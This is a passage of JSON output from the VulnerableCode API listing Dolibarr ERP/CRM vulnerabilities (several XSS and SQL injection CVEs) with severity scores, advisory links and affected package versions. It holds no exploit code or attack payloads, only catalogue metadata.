"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"}],"aliases":["CVE-2021-3991","GHSA-wppr-j57c-8jpm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t393-s4zx-uyhs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/132287?format=json","vulnerability_id":"VCID-tfxu-34ku-6uce","summary":"Cross Site Scripting vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the REST API module, related to analyseVarsForSqlAndScriptsInjection and testSqlAndScriptInject.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38888","reference_id":"","reference_type":"","scores":[{"value":"0.05006","scoring_system":"epss","scoring_elements":"0.89938","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38888"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38888","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38888"},{"reference_url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf","reference_id":"AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/"}],"url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf"},{"reference_url":"http://dolibarr.com","reference_id":"dolibarr.com","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://github.com/advisories/GHSA-62wf-h26v-5m57","reference_id":"GHSA-62wf-h26v-5m57","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-62wf-h26v-5m57"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/379718?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-38888","GHSA-62wf-h26v-5m57"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tfxu-34ku-6uce"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/207530?format=json","vulnerability_id":"VCID-vxpt-gdg8-r7dc","summary":"SQL Injection in dolibarr","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0224","reference_id":"","reference_type":"","scores":[{"value":"0.00515","scoring_system":"epss","scoring_elements":"0.67057","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0224"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/b9b45fb50618aa8053961f50bc8604b188d0ea79","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/b9b45fb50618aa8053961f50bc8604b188d0ea79"},{"reference_url":"https://huntr.dev/bounties/f1d1ce3e-ca92-4c7b-b1b8-934e28eaa486","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/f1d1ce3e-ca92-4c7b-b1b8-934e28eaa486"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0224","reference_id":"CVE-2022-0224","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0224"},{"reference_url":"https://github.com/advisories/GHSA-j545-frh3-r9gq","reference_id":"GHSA-j545-frh3-r9gq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j545-frh3-r9gq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/18669?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"}],"aliases":["CVE-2022-0224","GHSA-j545-frh3-r9gq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vxpt-gdg8-r7dc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/209452?format=json","vulnerability_id":"VCID-w6uz-k9fr-jkdr","summary":"Dolibarr SQL Injection vulnerability","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-9019","reference_id":"","reference_type":"","scores":[{"value":"0.01997","scoring_system":"epss","scoring_elements":"0.84017","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-9019"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/83b762b681c6dfdceb809d26ce95f3667b614739","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/83b762b681c6dfdceb809d26ce95f3667b614739"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-9019","reference_id":"CVE-2018-9019","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-9019"},{"reference_url":"https://github.com/advisories/GHSA-fff9-m6f6-q3mh","reference_id":"GHSA-fff9-m6f6-q3mh","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fff9-m6f6-q3mh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/21306?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-tghv-9zk4-6fde"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2"}],"aliases":["CVE-2018-9019","GHSA-fff9-m6f6-q3mh"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w6uz-k9fr-jkdr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/133835?format=json","vulnerability_id":"VCID-wtcs-fcvg-dkgm","summary":"Cross-site Scripting (XSS) - Stored in GitHub repository dolibarr/dolibarr prior to 16.0.5.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5842","reference_id":"","reference_type":"","scores":[{"value":"0.0012","scoring_system":"epss","scoring_elements":"0.30477","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5842"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5842","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5842"},{"reference_url":"https://huntr.com/bounties/aed81114-5952-46f5-ae3a-e66518e98ba3","reference_id":"aed81114-5952-46f5-ae3a-e66518e98ba3","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T17:50:34Z/"}],"url":"https://huntr.com/bounties/aed81114-5952-46f5-ae3a-e66518e98ba3"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/f569048eb2bd823525bce4ef52316e7a83e3345c","reference_id":"f569048eb2bd823525bce4ef52316e7a83e3345c","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T17:50:34Z/"}],"url":"https://github.com/dolibarr/dolibarr/commit/f569048eb2bd823525bce4ef52316e7a83e3345c"},{"reference_url":"https://github.com/advisories/GHSA-9pjf-jw9q-fx49","reference_id":"GHSA-9pjf-jw9q-fx49","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9pjf-jw9q-fx49"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/379062?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.5"}],"aliases":["CVE-2023-5842","GHSA-9pjf-jw9q-fx49"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wtcs-fcvg-dkgm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/337020?format=json","vulnerability_id":"VCID-ww61-hqb4-m3db","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25955","reference_id":"","reference_type":"","scores":[{"value":"0.00415","scoring_system":"epss","scoring_elements":"0.62104","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25955"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25955","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25955"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/391503?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/19977?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25955","GHSA-cpv8-6xgr-rmf6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ww61-hqb4-m3db"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/313684?format=json","vulnerability_id":"VCID-x7qz-jffh-9ydk","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19211","reference_id":"","reference_type":"","scores":[{"value":"0.02101","scoring_system":"epss","scoring_elements":"0.84431","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19211"},{"reference_url":"https://herolab.usd.de/en/security-advisories/usd-2019-0053","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/en/security-advisories/usd-2019-0053"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19211","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19211"},{"reference_url":"https://www.dolibarr.org/forum/dolibarr-changelogs","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/forum/dolibarr-changelogs"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/384973?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3zrg-f35e-ayea"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/455609?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcv